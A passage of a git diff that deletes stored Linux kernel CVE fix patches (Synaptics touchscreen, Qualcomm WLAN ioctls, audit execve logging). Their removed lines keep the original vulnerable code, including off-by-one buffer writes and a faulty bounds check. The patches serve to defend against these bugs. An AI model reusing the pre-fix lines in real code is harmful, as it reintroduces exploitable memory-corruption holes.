-- }
-+ /* NOTE: we don't ever want to trust this value for anything
-+ * serious, but the audit record format insists we
-+ * provide an argument length for really long arguments,
-+ * e.g. > MAX_EXECVE_AUDIT_LEN, so we have no choice but
-+ * to use strncpy_from_user() to obtain this value for
-+ * recording in the log, although we don't use it
-+ * anywhere here to avoid a double-fetch problem */
-+ if (len_full == 0)
-+ len_full = strnlen_user(p, MAX_ARG_STRLEN) - 1;
-+
-+ /* read more data from userspace */
-+ if (require_data) {
-+ /* can we make more room in the buffer? */
-+ if (buf != buf_head) {
-+ memmove(buf_head, buf, len_buf);
-+ buf = buf_head;
-+ }
-+
-+ /* fetch as much as we can of the argument */
-+ len_tmp = strncpy_from_user(&buf_head[len_buf], p,
-+ len_max - len_buf);
-+ if (len_tmp == -EFAULT) {
-+ /* unable to copy from userspace */
-+ send_sig(SIGKILL, current, 0);
-+ goto out;
-+ } else if (len_tmp == (len_max - len_buf)) {
-+ /* buffer is not large enough */
-+ require_data = true;
-+ /* NOTE: if we are going to span multiple
-+ * buffers force the encoding so we stand
-+ * a chance at a sane len_full value and
-+ * consistent record encoding */
-+ encode = true;
-+ len_full = len_full * 2;
-+ p += len_tmp;
-+ } else {
-+ require_data = false;
-+ if (!encode)
-+ encode = audit_string_contains_control(
-+ buf, len_tmp);
-+ /* try to use a trusted value for len_full */
-+ if (len_full < len_max)
-+ len_full = (encode ?
-+ len_tmp * 2 : len_tmp);
-+ p += len_tmp + 1;
-+ }
-+ len_buf += len_tmp;
-+ buf_head[len_buf] = '\0';
-
-- /*
-- * first record needs to say how long the original string was
-- * so we can be sure nothing was lost.
-- */
-- if ((i == 0) && (too_long))
-- audit_log_format(*ab, " a%d_len=%zu", arg_num,
-- has_cntl ? 2*len : len);
--
-- /*
-- * normally arguments are small enough to fit and we already
-- * filled buf above when we checked for control characters
-- * so don't bother with another copy_from_user
-- */
-- if (len >= max_execve_audit_len)
-- ret = copy_from_user(buf, p, to_send);
-- else
-- ret = 0;
-- if (ret) {
-- WARN_ON(1);
-- send_sig(SIGKILL, current, 0);
-- return -1;
-+ /* length of the buffer in the audit record? */
-+ len_abuf = (encode ? len_buf * 2 : len_buf + 2);
- }
-- buf[to_send] = '\0';
--
-- /* actually log it */
-- audit_log_format(*ab, " a%d", arg_num);
-- if (too_long)
-- audit_log_format(*ab, "[%d]", i);
-- audit_log_format(*ab, "=");
-- if (has_cntl)
-- audit_log_n_hex(*ab, buf, to_send);
-- else
-- audit_log_string(*ab, buf);
--
-- p += to_send;
-- len_left -= to_send;
-- *len_sent += arg_num_len;
-- if (has_cntl)
-- *len_sent += to_send * 2;
-- else
-- *len_sent += to_send;
-- }
-- /* include the null we didn't log */
-- return len + 1;
--}
-
--static void audit_log_execve_info(struct audit_context *context,
-- struct audit_buffer **ab)
--{
-- int i, len;
-- size_t len_sent = 0;
-- const char __user *p;
-- char *buf;
-+ /* write as much as we can to the audit log */
-+ if (len_buf > 0) {
-+ /* NOTE: some magic numbers here - basically if we
-+ * can't fit a reasonable amount of data into the
-+ * existing audit buffer, flush it and start with
-+ * a new buffer */
-+ if ((sizeof(abuf) + 8) > len_rem) {
-+ len_rem = len_max;
-+ audit_log_end(*ab);
-+ *ab = audit_log_start(context,
-+ GFP_KERNEL, AUDIT_EXECVE);
-+ if (!*ab)
-+ goto out;
-+ }
-
-- p = (const char __user *)current->mm->arg_start;
-+ /* create the non-arg portion of the arg record */
-+ len_tmp = 0;
-+ if (require_data || (iter > 0) ||
-+ ((len_abuf + sizeof(abuf)) > len_rem)) {
-+ if (iter == 0) {
-+ len_tmp += snprintf(&abuf[len_tmp],
-+ sizeof(abuf) - len_tmp,
-+ " a%d_len=%lu",
-+ arg, len_full);
-+ }
-+ len_tmp += snprintf(&abuf[len_tmp],
-+ sizeof(abuf) - len_tmp,
-+ " a%d[%d]=", arg, iter++);
-+ } else
-+ len_tmp += snprintf(&abuf[len_tmp],
-+ sizeof(abuf) - len_tmp,
-+ " a%d=", arg);
-+ WARN_ON(len_tmp >= sizeof(abuf));
-+ abuf[sizeof(abuf) - 1] = '\0';
-+
-+ /* log the arg in the audit record */
-+ audit_log_format(*ab, "%s", abuf);
-+ len_rem -= len_tmp;
-+ len_tmp = len_buf;
-+ if (encode) {
-+ if (len_abuf > len_rem)
-+ len_tmp = len_rem / 2; /* encoding */
-+ audit_log_n_hex(*ab, buf, len_tmp);
-+ len_rem -= len_tmp * 2;
-+ len_abuf -= len_tmp * 2;
-+ } else {
-+ if (len_abuf > len_rem)
-+ len_tmp = len_rem - 2; /* quotes */
-+ audit_log_n_string(*ab, buf, len_tmp);
-+ len_rem -= len_tmp + 2;
-+ /* don't subtract the "2" because we still need
-+ * to add quotes to the remaining string */
-+ len_abuf -= len_tmp;
-+ }
-+ len_buf -= len_tmp;
-+ buf += len_tmp;
-+ }
-
-- audit_log_format(*ab, "argc=%d", context->execve.argc);
-+ /* ready to move to the next argument? */
-+ if ((len_buf == 0) && !require_data) {
-+ arg++;
-+ iter = 0;
-+ len_full = 0;
-+ require_data = true;
-+ encode = false;
-+ }
-+ } while (arg < context->execve.argc);
-
-- /*
-- * we need some kernel buffer to hold the userspace args. Just
-- * allocate one big one rather than allocating one of the right size
-- * for every single argument inside audit_log_single_execve_arg()
-- * should be <8k allocation so should be pretty safe.
-- */
-- buf = kmalloc(MAX_EXECVE_AUDIT_LEN + 1, GFP_KERNEL);
-- if (!buf) {
-- audit_panic("out of memory for argv string");
-- return;
-- }
-+ /* NOTE: the caller handles the final audit_log_end() call */
-
-- for (i = 0; i < context->execve.argc; i++) {
-- len = audit_log_single_execve_arg(context, ab, i,
-- &len_sent, p, buf);
-- if (len <= 0)
-- break;
-- p += len;
-- }
-- kfree(buf);
-+out:
-+ kfree(buf_head);
- }
-
- static void show_special(struct audit_context *context, int *call_panic)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6672/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6672/ANY/0001.patch
deleted file mode 100644
index 436c5316..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6672/ANY/0001.patch
+++ /dev/null
@@ -1,65 +0,0 @@
-From d8649432b96bd361de20168372c10269e88e1258 Mon Sep 17 00:00:00 2001
-From: Min Chong
-Date: Wed, 17 Aug 2016 23:50:14 -0700
-Subject: [PATCH] input: synaptics: allocate heap memory for buffer
-
-Allocate buffer memory on the heap instead of the stack
-to avoid a potential stack overflow in the write function.
-
-Bug: 30537088
-Change-Id: Ibe54ac391ade69e4c0c87bf5332c8bcae730e94c
-Signed-off-by: Ivan Lozano
----
- drivers/input/touchscreen/synaptics_i2c_rmi4.c | 25 ++++++++++++++++---------
- 1 file changed, 16 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_i2c_rmi4.c b/drivers/input/touchscreen/synaptics_i2c_rmi4.c
-index eade21de3e15d..ecfbe6a3f9a23 100644
---- a/drivers/input/touchscreen/synaptics_i2c_rmi4.c
-+++ b/drivers/input/touchscreen/synaptics_i2c_rmi4.c
-@@ -1214,15 +1214,16 @@ static int synaptics_rmi4_i2c_write(struct synaptics_rmi4_data *rmi4_data,
- {
- int retval;
- unsigned char retry;
-- unsigned char buf[length + 1];
-- struct i2c_msg msg[] = {
-- {
-- .addr = rmi4_data->i2c_client->addr,
-- .flags = 0,
-- .len = length + 1,
-- .buf = buf,
-- }
-- };
-+ unsigned char *buf;
-+ struct i2c_msg msg[1];
-+
-+ buf = kzalloc(length + 1, GFP_KERNEL);
-+ if (!buf) {
-+ dev_err(&rmi4_data->i2c_client->dev,
-+ "%s: Failed to alloc mem for buffer\n",
-+ __func__);
-+ return -ENOMEM;
-+ }
-
- mutex_lock(&(rmi4_data->rmi4_io_ctrl_mutex));
-
-@@ -1230,6 +1231,11 @@ static int synaptics_rmi4_i2c_write(struct synaptics_rmi4_data *rmi4_data,
- if (retval != PAGE_SELECT_LEN)
- goto exit;
-
-+ msg[0].addr = rmi4_data->i2c_client->addr;
-+ msg[0].flags = 0;
-+ msg[0].len = length + 1;
-+ msg[0].buf = buf;
-+
- buf[0] = addr & MASK_8BIT;
- memcpy(&buf[1], &data[0], length);
-
-@@ -1253,6 +1259,7 @@ static int synaptics_rmi4_i2c_write(struct synaptics_rmi4_data *rmi4_data,
-
- exit:
- mutex_unlock(&(rmi4_data->rmi4_io_ctrl_mutex));
-+ kfree(buf);
-
- return retval;
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-6675/prima/0001.patch b/Patches/Linux_CVEs/CVE-2016-6675/prima/0001.patch
deleted file mode 100644
index 3d55ca34..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6675/prima/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 1353fa0bd0c78427f3ae7d9bde7daeb75bd01d09 Mon Sep 17 00:00:00 2001
-From: Manjeet Singh
-Date: Tue, 3 May 2016 16:21:46 +0530
-Subject: wlan: fix buffer overflow in linkspeed ioctl
-
-cld to prima propagation.
-
-In linkspeed ioctl handler, mac address array is allocated a
-size of MAC_ADDRESS_STR_LEN, which is 18 bytes taking account of null
-terminator '\0'. But in code, a null terminator is being manually added
-at index MAC_ADDRESS_STR_LEN. This would overflow the buffer and hence
-null terminator should be added at MAC_ADDRESS_STR_LEN -1.
-
-Change-Id: I16c2d0f787dfa339780db7d888aff37355c32322
-CRs-fixed: 1000861
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index a9167f3..03889a4 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -4662,7 +4662,7 @@ int __iw_get_softap_linkspeed(struct net_device *dev,
- kfree(pmacAddress);
- return -EFAULT;
- }
-- pmacAddress[MAC_ADDRESS_STR_LEN] = '\0';
-+ pmacAddress[MAC_ADDRESS_STR_LEN-1] = '\0';
-
- status = hdd_string_to_hex (pmacAddress, MAC_ADDRESS_STR_LEN, macAddress );
- kfree(pmacAddress);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6676/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-6676/qcacld-2.0/0001.patch
deleted file mode 100644
index d3ff16bf..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6676/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 6ba9136879232442a182996427e5c88e5a7512a8 Mon Sep 17 00:00:00 2001
-From: Hanumantha Reddy Pothula
-Date: Wed, 13 Apr 2016 10:50:46 +0530
-Subject: qcacld-2.0: Resolve buffer overflow issue while processing GET_CFG
- IOCTL
-
-There is a possibility of buffer overflow while processing
-GET_CFG IOCTL to retrieve ini parameters from a global array,
-because of invalid if condition.
-Resolve buffer overflow issue by correcting if condition.
-
-Change-Id: I8881abde0b543d7b1562968ecbb6240a0ca552a3
-CRs-Fixed: 1000853
----
- CORE/HDD/src/wlan_hdd_cfg.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg.c b/CORE/HDD/src/wlan_hdd_cfg.c
-index 2904284..1a669d9 100644
---- a/CORE/HDD/src/wlan_hdd_cfg.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg.c
-@@ -4974,7 +4974,7 @@ static VOS_STATUS hdd_cfg_get_config(REG_TABLE_ENTRY *reg_table,
- // ideally we want to return the config to the application
- // however the config is too big so we just printk() for now
- #ifdef RETURN_IN_BUFFER
-- if (curlen <= buflen)
-+ if (curlen < buflen)
- {
- // copy string + '\0'
- memcpy(pCur, configStr, curlen+1);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6679/prima/0001.patch b/Patches/Linux_CVEs/CVE-2016-6679/prima/0001.patch
deleted file mode 100644
index de5d237a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6679/prima/0001.patch
+++ /dev/null
@@ -1,480 +0,0 @@
-From d39345f0abc309959d831d09fcbf1619cc0ae0f5 Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga
-Date: Thu, 26 May 2016 15:07:50 +0530
-Subject: wlan: Remove the support for setwpaie ioctl
-
-This ioctl gets call during the start of SAP/hostapd with wext
-interface and which is obsolete, currently using nl80211 interface
-for the same
-
-Remove the code related to setwpaie ioctl
-
-CRs-Fixed: 1000913
-Change-Id: I8b00db1753d8f72192e4cdb88bc7c638007180fe
----
- CORE/HDD/inc/qc_sap_ioctl.h | 4 +-
- CORE/HDD/src/wlan_hdd_hostapd.c | 414 ----------------------------------------
- 2 files changed, 2 insertions(+), 416 deletions(-)
-
-diff --git a/CORE/HDD/inc/qc_sap_ioctl.h b/CORE/HDD/inc/qc_sap_ioctl.h
-index dfa7d1c..2bc3b6a 100644
---- a/CORE/HDD/inc/qc_sap_ioctl.h
-+++ b/CORE/HDD/inc/qc_sap_ioctl.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2013 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2016 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- * -@@ -143,7 +143,7 @@ typedef struct - #define QCSAP_IOCTL_COMMIT (SIOCIWFIRSTPRIV+2) - - #define QCSAP_IOCTL_GET_STAWPAIE (SIOCIWFIRSTPRIV+4) --#define QCSAP_IOCTL_SETWPAIE (SIOCIWFIRSTPRIV+5) -+ - #define QCSAP_IOCTL_STOPBSS (SIOCIWFIRSTPRIV+6) - #define QCSAP_IOCTL_VERSION (SIOCIWFIRSTPRIV+7) - #define QCSAP_IOCTL_GET_WPS_PBC_PROBE_REQ_IES (SIOCIWFIRSTPRIV+8) -diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c -index 03889a4..752a34c 100644 ---- a/CORE/HDD/src/wlan_hdd_hostapd.c -+++ b/CORE/HDD/src/wlan_hdd_hostapd.c -@@ -3862,417 +3862,6 @@ static int iw_get_mode(struct net_device *dev, - return ret; - } - --static int __iw_softap_setwpsie(struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *wrqu, -- char *extra) --{ -- hdd_adapter_t *pHostapdAdapter; -- hdd_context_t *pHddCtx; -- v_CONTEXT_t pVosContext; -- hdd_hostapd_state_t *pHostapdState; -- eHalStatus halStatus= eHAL_STATUS_SUCCESS; -- u_int8_t *wps_genie; -- u_int8_t *fwps_genie; -- u_int8_t *pos; -- tpSap_WPSIE pSap_WPSIe; -- u_int8_t WPSIeType; -- u_int16_t length; -- struct iw_point s_priv_data; -- int ret = 0; -- -- ENTER(); -- -- if (!capable(CAP_NET_ADMIN)) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- FL("permission check failed")); -- return -EPERM; -- } -- -- pHostapdAdapter = (netdev_priv(dev)); -- if (NULL == pHostapdAdapter) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "%s: Adapter is NULL",__func__); -- return -EINVAL; -- } -- pHddCtx = WLAN_HDD_GET_CTX(pHostapdAdapter); -- ret = wlan_hdd_validate_context(pHddCtx); -- if (0 != ret) -- { -- return ret; -- } -- pVosContext = pHddCtx->pvosContext; -- if (NULL == pVosContext) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "%s: HDD context is not valid ",__func__); -- return -EINVAL; -- } -- /* helper function to get iwreq_data with compat handling. 
*/ -- if (hdd_priv_get_data(&s_priv_data, wrqu)) -- { -- return -EINVAL; -- } -- -- if ((NULL == s_priv_data.pointer) || (s_priv_data.length < QCSAP_MAX_WSC_IE)) -- { -- return -EINVAL; -- } -- -- wps_genie = mem_alloc_copy_from_user_helper(s_priv_data.pointer, -- s_priv_data.length); -- -- if(NULL == wps_genie) -- { -- hddLog(LOG1, "%s: failed to alloc memory " -- "and copy data from user buffer", __func__); -- return -EFAULT; -- } -- -- fwps_genie = wps_genie; -- -- pSap_WPSIe = vos_mem_malloc(sizeof(tSap_WPSIE)); -- if (NULL == pSap_WPSIe) -- { -- hddLog(LOGE, "VOS unable to allocate memory"); -- kfree(fwps_genie); -- return -ENOMEM; -- } -- vos_mem_zero(pSap_WPSIe, sizeof(tSap_WPSIE)); -- -- hddLog(LOG1,"%s WPS IE type[0x%X] IE[0x%X], LEN[%d]", __func__, wps_genie[0], wps_genie[1], wps_genie[2]); -- WPSIeType = wps_genie[0]; -- if ( wps_genie[0] == eQC_WPS_BEACON_IE) -- { -- pSap_WPSIe->sapWPSIECode = eSAP_WPS_BEACON_IE; -- wps_genie = wps_genie + 1; -- switch ( wps_genie[0] ) -- { -- case DOT11F_EID_WPA: -- if (wps_genie[1] < 2 + 4) -- { -- ret = -EINVAL; -- goto exit; -- } -- else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) -- { -- hddLog (LOG1, "%s Set WPS BEACON IE(len %d)",__func__, wps_genie[1]+2); -- pos = &wps_genie[6]; -- while (((size_t)pos - (size_t)&wps_genie[6]) < (wps_genie[1] - 4) ) -- { -- switch((u_int16_t)(*pos<<8) | *(pos+1)) -- { -- case HDD_WPS_ELEM_VERSION: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.Version = *pos; -- hddLog(LOG1, "WPS version %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.Version); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_VER_PRESENT; -- pos += 1; -- break; -- -- case HDD_WPS_ELEM_WPS_STATE: -- pos +=4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.wpsState = *pos; -- hddLog(LOG1, "WPS State %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.wpsState); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_STATE_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_APSETUPLOCK: -- pos += 4; 
-- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.APSetupLocked = *pos; -- hddLog(LOG1, "AP setup lock %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.APSetupLocked); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_APSETUPLOCK_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_SELECTEDREGISTRA: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistra = *pos; -- hddLog(LOG1, "Selected Registra %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistra); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_SELECTEDREGISTRA_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_DEVICE_PASSWORD_ID: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.DevicePasswordID = (*pos<<8) | *(pos+1); -- hddLog(LOG1, "Password ID: %x", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.DevicePasswordID); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_DEVICEPASSWORDID_PRESENT; -- pos += 2; -- break; -- case HDD_WPS_ELEM_REGISTRA_CONF_METHODS: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistraCfgMethod = (*pos<<8) | *(pos+1); -- hddLog(LOG1, "Select Registra Config Methods: %x", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistraCfgMethod); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_SELECTEDREGISTRACFGMETHOD_PRESENT; -- pos += 2; -- break; -- -- case HDD_WPS_ELEM_UUID_E: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E)) -- { -- ret = -EINVAL; -- goto exit; -- } -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT; -- pos += length; -- break; -- case HDD_WPS_ELEM_RF_BANDS: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.RFBand = *pos; -- hddLog(LOG1, "RF band: %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.RFBand); -- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_RF_BANDS_PRESENT; -- pos += 1; -- break; -- -- default: -- 
hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)", (*pos<<8 | *(pos+1))); -- ret = -EINVAL; -- goto exit; -- } -- } -- } -- else { -- hddLog (LOGE, "%s WPS IE Mismatch %X", -- __func__, wps_genie[0]); -- } -- break; -- -- default: -- hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]); -- ret = -EINVAL; -- goto exit; -- } -- } -- else if( wps_genie[0] == eQC_WPS_PROBE_RSP_IE) -- { -- pSap_WPSIe->sapWPSIECode = eSAP_WPS_PROBE_RSP_IE; -- wps_genie = wps_genie + 1; -- switch ( wps_genie[0] ) -- { -- case DOT11F_EID_WPA: -- if (wps_genie[1] < 2 + 4) -- { -- ret = -EINVAL; -- goto exit; -- } -- else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) -- { -- hddLog (LOG1, "%s Set WPS PROBE RSP IE(len %d)",__func__, wps_genie[1]+2); -- pos = &wps_genie[6]; -- while (((size_t)pos - (size_t)&wps_genie[6]) < (wps_genie[1] - 4) ) -- { -- switch((u_int16_t)(*pos<<8) | *(pos+1)) -- { -- case HDD_WPS_ELEM_VERSION: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Version = *pos; -- hddLog(LOG1, "WPS version %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Version); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_VER_PRESENT; -- pos += 1; -- break; -- -- case HDD_WPS_ELEM_WPS_STATE: -- pos +=4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.wpsState = *pos; -- hddLog(LOG1, "WPS State %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.wpsState); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_STATE_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_APSETUPLOCK: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.APSetupLocked = *pos; -- hddLog(LOG1, "AP setup lock %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.APSetupLocked); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_APSETUPLOCK_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_SELECTEDREGISTRA: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistra = *pos; -- hddLog(LOG1, "Selected Registra %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistra); -- 
pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SELECTEDREGISTRA_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_DEVICE_PASSWORD_ID: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DevicePasswordID = (*pos<<8) | *(pos+1); -- hddLog(LOG1, "Password ID: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DevicePasswordID); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_DEVICEPASSWORDID_PRESENT; -- pos += 2; -- break; -- case HDD_WPS_ELEM_REGISTRA_CONF_METHODS: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod = (*pos<<8) | *(pos+1); -- hddLog(LOG1, "Select Registra Config Methods: %x", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SelectedRegistraCfgMethod); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SELECTEDREGISTRACFGMETHOD_PRESENT; -- pos += 2; -- break; -- case HDD_WPS_ELEM_RSP_TYPE: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ResponseType = *pos; -- hddLog(LOG1, "Config Methods: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ResponseType); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_RESPONSETYPE_PRESENT; -- pos += 1; -- break; -- case HDD_WPS_ELEM_UUID_E: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E))) -- { -- ret = -EINVAL; -- goto exit; -- } -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT; -- pos += length; -- break; -- -- case HDD_WPS_ELEM_MANUFACTURER: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name))) -- { -- ret = -EINVAL; -- goto exit; -- } -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length; -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= 
WPS_PROBRSP_MANUFACTURE_PRESENT; -- pos += length; -- break; -- -- case HDD_WPS_ELEM_MODEL_NAME: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text))) -- { -- ret = -EINVAL; -- goto exit; -- } -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length; -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNAME_PRESENT; -- pos += length; -- break; -- case HDD_WPS_ELEM_MODEL_NUM: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text))) -- { -- ret = -EINVAL; -- goto exit; -- } -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length; -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT; -- pos += length; -- break; -- case HDD_WPS_ELEM_SERIAL_NUM: -- pos += 2; -- length = *pos<<8 | *(pos+1); -- pos += 2; -- if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text))) -- { -- ret = -EINVAL; -- goto exit; -- } -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length; -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length); -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT; -- pos += length; -- break; -- case HDD_WPS_ELEM_PRIMARY_DEVICE_TYPE: -- pos += 4; -- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory = (*pos<<8 | *(pos+1)); -- hddLog(LOG1, "primary dev category: %d", pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceCategory); -- pos += 2; -- -- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.PrimaryDeviceOUI, pos, HDD_WPS_DEVICE_OUI_LEN); -- hddLog(LOG1, "primary dev oui: %02x, %02x, %02x, %02x", pos[0], pos[1], pos[2], pos[3]); -- pos += 
